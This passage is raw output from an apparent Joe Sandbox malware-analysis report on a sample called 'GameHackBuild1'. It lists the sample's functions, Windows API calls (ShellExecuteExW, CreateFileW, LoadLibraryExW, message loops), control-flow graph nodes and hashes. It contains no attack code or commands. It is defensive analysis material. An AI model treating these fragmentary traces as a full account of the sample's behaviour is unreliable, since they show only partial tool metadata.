                                        • Part of subcall function 00A1AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A1AC85
                                        • Part of subcall function 00A1AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A1AC96
                                        • Part of subcall function 00A1AC74: IsDialogMessageW.USER32(00010444,?), ref: 00A1ACAA
                                        • Part of subcall function 00A1AC74: TranslateMessage.USER32(?), ref: 00A1ACB8
                                        • Part of subcall function 00A1AC74: DispatchMessageW.USER32(?), ref: 00A1ACC2
                                      • GetDlgItem.USER32(00000068,00A5ECB0), ref: 00A1CB6E
                                      • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,00A1A632), ref: 00A1CB96
                                      • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00A1CBA1
                                      • SendMessageW.USER32(00000000,000000C2,00000000,00A335B4), ref: 00A1CBAF
                                      • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00A1CBC5
                                      • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00A1CBDF
                                      • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00A1CC23
                                      • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00A1CC31
                                      • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00A1CC40
                                      • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00A1CC67
                                      • SendMessageW.USER32(00000000,000000C2,00000000,00A3431C), ref: 00A1CC76
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                      • String ID: \
                                      • API String ID: 3569833718-2967466578
                                      • Opcode ID: 1cbc6ed34f3185c22f8644c53ecaab4eb3c4360bc49f1de6e1d97f0504ecbf13
                                      • Instruction ID: 5831c004a512c7c72aa27f0749cfd08ce7a06175ba90d2cabaad6ff6689c9792
                                      • Opcode Fuzzy Hash: 1cbc6ed34f3185c22f8644c53ecaab4eb3c4360bc49f1de6e1d97f0504ecbf13
                                      • Instruction Fuzzy Hash: DC31BE71185B41ABE301DF60AC4AFAF7EACEB82B14F010508FA51961D1DBA95D0AC7B6
                                      Function 00A1CE22 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 795 a1ce22-a1ce3a call a1e360 798 a1ce40-a1ce4c call a235b3 795->798 799 a1d08b-a1d093 795->799 798->799 802 a1ce52-a1ce7a call a1f350 798->802 805 a1ce84-a1ce91 802->805 806 a1ce7c 802->806 807 a1ce93 805->807 808 a1ce95-a1ce9e 805->808 806->805 807->808 809 a1cea0-a1cea2 808->809 810 a1ced6 808->810 811 a1ceaa-a1cead 809->811 812 a1ceda-a1cedd 810->812 813 a1ceb3-a1cebb 811->813 814 a1d03c-a1d041 811->814 815 a1cee4-a1cee6 812->815 816 a1cedf-a1cee2 812->816 817 a1cec1-a1cec7 813->817 818 a1d055-a1d05d 813->818 819 a1d043 814->819 820 a1d036-a1d03a 814->820 821 a1cef9-a1cf0e call a0b493 815->821 822 a1cee8-a1ceef 815->822 816->815 816->821 817->818 824 a1cecd-a1ced4 817->824 826 a1d065-a1d06d 818->826 827 a1d05f-a1d061 818->827 825 a1d048-a1d04c 819->825 820->814 820->825 830 a1cf10-a1cf1d call a117ac 821->830 831 a1cf27-a1cf32 call a0a180 821->831 822->821 828 a1cef1 822->828 824->810 824->811 825->818 826->812 827->826 828->821 830->831 836 a1cf1f 830->836 837 a1cf34-a1cf4b call a0b239 831->837 838 a1cf4f-a1cf5c ShellExecuteExW 831->838 836->831 837->838 840 a1cf62-a1cf6f 838->840 841 a1d08a 838->841 843 a1cf71-a1cf78 840->843 844 a1cf82-a1cf84 840->844 841->799 843->844 845 a1cf7a-a1cf80 843->845 846 a1cf86-a1cf8f 844->846 847 a1cf9b-a1cfba call a1d2e6 844->847 845->844 848 a1cff1-a1cffd CloseHandle 845->848 846->847 856 a1cf91-a1cf99 ShowWindow 846->856 847->848 865 a1cfbc-a1cfc4 847->865 849 a1cfff-a1d00c call a117ac 848->849 850 a1d00e-a1d01c 848->850 849->850 862 a1d072 849->862 854 a1d079-a1d07b 850->854 855 a1d01e-a1d020 850->855 854->841 859 a1d07d-a1d07f 854->859 855->854 860 a1d022-a1d028 855->860 856->847 859->841 863 a1d081-a1d084 ShowWindow 859->863 860->854 864 a1d02a-a1d034 860->864 862->854 863->841 864->854 865->848 866 a1cfc6-a1cfd7 GetExitCodeProcess 865->866 866->848 867 a1cfd9-a1cfe3 866->867 868 a1cfe5 867->868 869 a1cfea 867->869 868->869 869->848
                                      APIs
                                      • ShellExecuteExW.SHELL32(?), ref: 00A1CF54
                                      • ShowWindow.USER32(?,00000000), ref: 00A1CF93
                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00A1CFCF
                                      • CloseHandle.KERNEL32(?), ref: 00A1CFF5
                                      • ShowWindow.USER32(?,00000001), ref: 00A1D084
                                        • Part of subcall function 00A117AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00A0BB05,00000000,.exe,?,?,00000800,?,?,00A185DF,?), ref: 00A117C2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                                      • String ID: $.exe$.inf
                                      • API String ID: 3686203788-2452507128
                                      • Opcode ID: a6dc0773f601de9db74cc0c116b5703c9890ba9812cdb4925e46490383f1760a
                                      • Instruction ID: f3f4d8426d8d56aa952f81bea8d09708e122fd1a2951f7fcbf2168c941a44fbe
                                      • Opcode Fuzzy Hash: a6dc0773f601de9db74cc0c116b5703c9890ba9812cdb4925e46490383f1760a
                                      • Instruction Fuzzy Hash: DD610271448380AADB31DF64D9006EBBBFAAF85310F08481DF5C697291D7B1DAC6CB92
                                      Function 00A2A058 Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 870 a2a058-a2a071 871 a2a073-a2a083 call a2e6ed 870->871 872 a2a087-a2a08c 870->872 871->872 879 a2a085 871->879 874 a2a099-a2a0bd MultiByteToWideChar 872->874 875 a2a08e-a2a096 872->875 877 a2a0c3-a2a0cf 874->877 878 a2a250-a2a263 call a1ec4a 874->878 875->874 880 a2a123 877->880 881 a2a0d1-a2a0e2 877->881 879->872 883 a2a125-a2a127 880->883 884 a2a101-a2a112 call a28518 881->884 885 a2a0e4-a2a0f3 call a31a30 881->885 887 a2a245 883->887 888 a2a12d-a2a140 MultiByteToWideChar 883->888 884->887 895 a2a118 884->895 885->887 898 a2a0f9-a2a0ff 885->898 893 a2a247-a2a24e call a2a2c0 887->893 888->887 892 a2a146-a2a158 call a2a72c 888->892 900 a2a15d-a2a161 892->900 893->878 899 a2a11e-a2a121 895->899 898->899 899->883 900->887 902 a2a167-a2a16e 900->902 903 a2a170-a2a175 902->903 904 a2a1a8-a2a1b4 902->904 903->893 907 a2a17b-a2a17d 903->907 905 a2a200 904->905 906 a2a1b6-a2a1c7 904->906 910 a2a202-a2a204 905->910 908 a2a1e2-a2a1f3 call a28518 906->908 909 a2a1c9-a2a1d8 call a31a30 906->909 907->887 911 a2a183-a2a19d call a2a72c 907->911 915 a2a23e-a2a244 call a2a2c0 908->915 924 a2a1f5 908->924 909->915 922 a2a1da-a2a1e0 909->922 914 a2a206-a2a21f call a2a72c 910->914 910->915 911->893 926 a2a1a3 911->926 914->915 927 a2a221-a2a228 914->927 915->887 928 a2a1fb-a2a1fe 922->928 924->928 926->887 929 a2a264-a2a26a 927->929 930 a2a22a-a2a22b 927->930 928->910 931 a2a22c-a2a23c WideCharToMultiByte 929->931 930->931 931->915 932 a2a26c-a2a273 call a2a2c0 931->932 932->893
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00A24F9B,00A24F9B,?,?,?,00A2A2A9,00000001,00000001,3FE85006), ref: 00A2A0B2
                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00A2A2A9,00000001,00000001,3FE85006,?,?,?), ref: 00A2A138
                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00A2A232
                                      • __freea.LIBCMT ref: 00A2A23F
                                        • Part of subcall function 00A28518: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A23A26,?,0000015D,?,?,?,?,00A24F02,000000FF,00000000,?,?), ref: 00A2854A
                                      • __freea.LIBCMT ref: 00A2A248
                                      • __freea.LIBCMT ref: 00A2A26D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                      • String ID:
                                      • API String ID: 1414292761-0
                                      • Opcode ID: ffbf9e03b782bce37d562bcd76375288929517cd1db05701ecc759711f6bc20d
                                      • Instruction ID: 52411840a8bcfbb3d6b1bc54649e13b9811928e623948bb7b05bebdab6ff0575
                                      • Opcode Fuzzy Hash: ffbf9e03b782bce37d562bcd76375288929517cd1db05701ecc759711f6bc20d
                                      • Instruction Fuzzy Hash: DF51CE72610226EFEB258F68ED41EFB77AAEB60760F154238FC05D6150EB35DC4087A2
                                      Function 00A099B0 Relevance: 7.6, APIs: 5, Instructions: 117filetimeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 935 a099b0-a099d1 call a1e360 938 a099d3-a099d6 935->938 939 a099dc 935->939 938->939 941 a099d8-a099da 938->941 940 a099de-a099fb 939->940 942 a09a03-a09a0d 940->942 943 a099fd 940->943 941->940 944 a09a12-a09a31 call a070bf 942->944 945 a09a0f 942->945 943->942 948 a09a33 944->948 949 a09a39-a09a57 CreateFileW 944->949 945->944 948->949 950 a09a59-a09a7b GetLastError call a0b66c 949->950 951 a09abb-a09ac0 949->951 960 a09aaa-a09aaf 950->960 961 a09a7d-a09a9f CreateFileW GetLastError 950->961 952 a09ae1-a09af5 951->952 953 a09ac2-a09ac5 951->953 956 a09b13-a09b1e 952->956 957 a09af7-a09b0f call a0fe56 952->957 953->952 955 a09ac7-a09adb SetFileTime 953->955 955->952 957->956 960->951 962 a09ab1 960->962 964 a09aa1 961->964 965 a09aa5-a09aa8 961->965 962->951 964->965 965->951 965->960
                                      APIs
                                      • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,00A078AD,?,00000005,?,00000011), ref: 00A09A4C
                                      • GetLastError.KERNEL32(?,?,00A078AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00A09A59
                                      • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,00A078AD,?,00000005,?), ref: 00A09A8E
                                      • GetLastError.KERNEL32(?,?,00A078AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00A09A96
                                      • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00A078AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00A09ADB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: File$CreateErrorLast$Time
                                      • String ID:
                                      • API String ID: 1999340476-0
                                      • Opcode ID: 93e4f5bd84c2480caeacc319832dc0c5286cea8ebe57ef255b332ff837516dc4
                                      • Instruction ID: 0a984fafceb671a0f03e47184584c1fb14f2ff4df612e0ff23164a082bd94d0c
                                      • Opcode Fuzzy Hash: 93e4f5bd84c2480caeacc319832dc0c5286cea8ebe57ef255b332ff837516dc4
                                      • Instruction Fuzzy Hash: 04415A316487496FE730CB20EC05BDBBBD4BB05364F100719F5E4961D2D775A989CBA1
                                      Function 00A1AC74 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 994 a1ac74-a1ac8d PeekMessageW 995 a1acc8-a1accc 994->995 996 a1ac8f-a1aca3 GetMessageW 994->996 997 a1aca5-a1acb2 IsDialogMessageW 996->997 998 a1acb4-a1acc2 TranslateMessage DispatchMessageW 996->998 997->995 997->998 998->995
                                      APIs
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A1AC85
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A1AC96
                                      • IsDialogMessageW.USER32(00010444,?), ref: 00A1ACAA
                                      • TranslateMessage.USER32(?), ref: 00A1ACB8
                                      • DispatchMessageW.USER32(?), ref: 00A1ACC2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: Message$DialogDispatchPeekTranslate
                                      • String ID:
                                      • API String ID: 1266772231-0
                                      • Opcode ID: f53dad40bd84ec54180918a1f9c4e42f64fc97a38bb9bf754a7891639e4bfd4f
                                      • Instruction ID: ddb3d226a0ec4d36ea3a3e8a27c44b66e3b9882f5a811e22ae5fdeabca6fffd1
                                      • Opcode Fuzzy Hash: f53dad40bd84ec54180918a1f9c4e42f64fc97a38bb9bf754a7891639e4bfd4f
                                      • Instruction Fuzzy Hash: F5F0177190222AAB8B20DBE2AC4CEEB7F7CEE052A17404415F909D2140EA68D846CBF1
                                      Function 00A1A2C7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 999 a1a2c7-a1a2e6 GetClassNameW 1000 a1a2e8-a1a2fd call a117ac 999->1000 1001 a1a30e-a1a310 999->1001 1006 a1a30d 1000->1006 1007 a1a2ff-a1a30b FindWindowExW 1000->1007 1003 a1a312-a1a315 SHAutoComplete 1001->1003 1004 a1a31b-a1a31f 1001->1004 1003->1004 1006->1001 1007->1006
                                      APIs
                                      • GetClassNameW.USER32(?,?,00000050), ref: 00A1A2DE
                                      • SHAutoComplete.SHLWAPI(?,00000010), ref: 00A1A315
                                        • Part of subcall function 00A117AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00A0BB05,00000000,.exe,?,?,00000800,?,?,00A185DF,?), ref: 00A117C2
                                      • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00A1A305
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AutoClassCompareCompleteFindNameStringWindow
                                      • String ID: EDIT
                                      • API String ID: 4243998846-3080729518
                                      • Opcode ID: 25e41870aa9d0de8c9b5651bd083fe3ce09ebfd715cfe2e7308c070635bd57d7
                                      • Instruction ID: db5eb33bd5c0cf4062000398afb84588794639674a8e5abc728652802705f1e4
                                      • Opcode Fuzzy Hash: 25e41870aa9d0de8c9b5651bd083fe3ce09ebfd715cfe2e7308c070635bd57d7
                                      • Instruction Fuzzy Hash: 29F0E236B0262877E7209B64AD09FDB776C9B46B40F090052FE04A6180D7A0AD82C6F6
                                      Function 00A1A335 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35comCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00A10085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00A100A0
                                        • Part of subcall function 00A10085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00A0EB86,Crypt32.dll,00000000,00A0EC0A,?,?,00A0EBEC,?,?,?), ref: 00A100C2
                                      • OleInitialize.OLE32(00000000), ref: 00A1A34E
                                      • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00A1A385
                                      • SHGetMalloc.SHELL32(00A48430), ref: 00A1A38F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                      • String ID: riched20.dll
                                      • API String ID: 3498096277-3360196438
                                      • Opcode ID: 0d52dc6e9dc2957e265fa8365c6cfaac90ed828472226f46d9f48fe8779763f6
                                      • Instruction ID: 2ce9480c5242fa69eb8758995494d95d962e9b04b4ae305c6452264bce96f1af
                                      • Opcode Fuzzy Hash: 0d52dc6e9dc2957e265fa8365c6cfaac90ed828472226f46d9f48fe8779763f6
                                      • Instruction Fuzzy Hash: 9EF0FFB1D00209ABCB10EF99D949AEFFBFCEF95701F00415AF814E2240DBB856458BA1
                                      Function 00A0984E Relevance: 6.1, APIs: 4, Instructions: 57fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1012 a0984e-a0985a 1013 a09867-a0987e ReadFile 1012->1013 1014 a0985c-a09864 GetStdHandle 1012->1014 1015 a09880-a09889 call a09989 1013->1015 1016 a098da 1013->1016 1014->1013 1020 a098a2-a098a6 1015->1020 1021 a0988b-a09893 1015->1021 1018 a098dd-a098e2 1016->1018 1023 a098b7-a098bb 1020->1023 1024 a098a8-a098b1 GetLastError 1020->1024 1021->1020 1022 a09895 1021->1022 1028 a09896-a098a0 call a0984e 1022->1028 1026 a098d5-a098d8 1023->1026 1027 a098bd-a098c5 1023->1027 1024->1023 1025 a098b3-a098b5 1024->1025 1025->1018 1026->1018 1027->1026 1029 a098c7-a098d0 GetLastError 1027->1029 1028->1018 1029->1026 1031 a098d2-a098d3 1029->1031 1031->1028
                                      APIs
                                      • GetStdHandle.KERNEL32(000000F6), ref: 00A0985E
                                      • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00A09876
                                      • GetLastError.KERNEL32 ref: 00A098A8
                                      • GetLastError.KERNEL32 ref: 00A098C7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ErrorLast$FileHandleRead
                                      • String ID:
                                      • API String ID: 2244327787-0
                                      • Opcode ID: 13ac140f1b61cbe4193fee98c5f199503d7997a1d24376e8dbcc54a82f3b0b25
                                      • Instruction ID: 3bd043d26964e2e47516417ae8c57986da1c2aa7fe58359b15786f352909c8cd
                                      • Opcode Fuzzy Hash: 13ac140f1b61cbe4193fee98c5f199503d7997a1d24376e8dbcc54a82f3b0b25
                                      • Instruction Fuzzy Hash: CD119A3190420CEBDF209B51E904AAB77A8EB47731F10C12AF82A857D2D7359E489F51
                                      Function 00A2A4F4 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1033 a2a4f4-a2a508 1034 a2a515-a2a530 LoadLibraryExW 1033->1034 1035 a2a50a-a2a513 1033->1035 1037 a2a532-a2a53b GetLastError 1034->1037 1038 a2a559-a2a55f 1034->1038 1036 a2a56c-a2a56e 1035->1036 1041 a2a54a 1037->1041 1042 a2a53d-a2a548 LoadLibraryExW 1037->1042 1039 a2a561-a2a562 FreeLibrary 1038->1039 1040 a2a568 1038->1040 1039->1040 1043 a2a56a-a2a56b 1040->1043 1044 a2a54c-a2a54e 1041->1044 1042->1044 1043->1036 1044->1038 1045 a2a550-a2a557 1044->1045 1045->1043
                                      APIs
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00A2388F,00000000,00000000,?,00A2A49B,00A2388F,00000000,00000000,00000000,?,00A2A698,00000006,FlsSetValue), ref: 00A2A526
                                      • GetLastError.KERNEL32(?,00A2A49B,00A2388F,00000000,00000000,00000000,?,00A2A698,00000006,FlsSetValue,00A37348,00A37350,00000000,00000364,?,00A29077), ref: 00A2A532
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00A2A49B,00A2388F,00000000,00000000,00000000,?,00A2A698,00000006,FlsSetValue,00A37348,00A37350,00000000), ref: 00A2A540
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: LibraryLoad$ErrorLast
                                      • String ID:
                                      • API String ID: 3177248105-0
                                      • Opcode ID: a9d1f54caae2cc76f5f1ebb560a38e2f6db057f1a797e9ceb90989061b102ab4
                                      • Instruction ID: da321d5ad06b30e063de376211c05fdc4e2046df06f45485c617e94a72d1a120
                                      • Opcode Fuzzy Hash: a9d1f54caae2cc76f5f1ebb560a38e2f6db057f1a797e9ceb90989061b102ab4
                                      • Instruction Fuzzy Hash: AA012B33755232ABCB21CBACBC44A57BBA8AF65BA17240630FD0BD7140D735D901CAE1
                                      Function 00A10889 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateThread.KERNELBASE(00000000,00010000,Function_000109D0,?,00000000,00000000), ref: 00A108AD
                                      • SetThreadPriority.KERNEL32(?,00000000), ref: 00A108F4
                                        • Part of subcall function 00A06E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A06EAF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
